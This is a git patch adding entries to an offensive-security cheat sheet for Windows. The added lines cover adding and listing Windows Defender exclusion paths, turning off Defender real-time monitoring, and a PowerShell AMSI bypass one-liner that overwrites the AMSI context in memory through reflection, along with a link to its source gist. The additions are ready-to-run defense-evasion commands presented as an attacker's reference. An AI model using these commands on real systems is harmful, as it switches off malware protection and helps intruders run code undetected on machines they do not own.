From 05c5690c0b9eef0172e4903fed99119d5417cae2 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sat, 16 Jul 2022 23:41:15 +0500
Subject: [PATCH] Update Cheat Sheet.md

---
 Cheat Sheet.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)

diff --git a/Cheat Sheet.md b/Cheat Sheet.md
index b404a30..5f3c4d0 100644
--- a/Cheat Sheet.md
+++ b/Cheat Sheet.md
@@ -387,6 +387,25 @@ Or
 Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
 ```
 
+### Defender Add exclusion path
+
+`Add-MpPreference -ExclusionPath C:\temp`
+
+### Defender exclusion path
+
+`reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s`
+
+### Disabling defender
+
+`Set-MpPreference -DisableRealtimeMonitoring $true`
+
+### AMSI Bypass
+
+```
+$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils"){$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
+```
+https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093
+
 ### Evil-winrm
 
 `evil-winrm -i IP -u -p `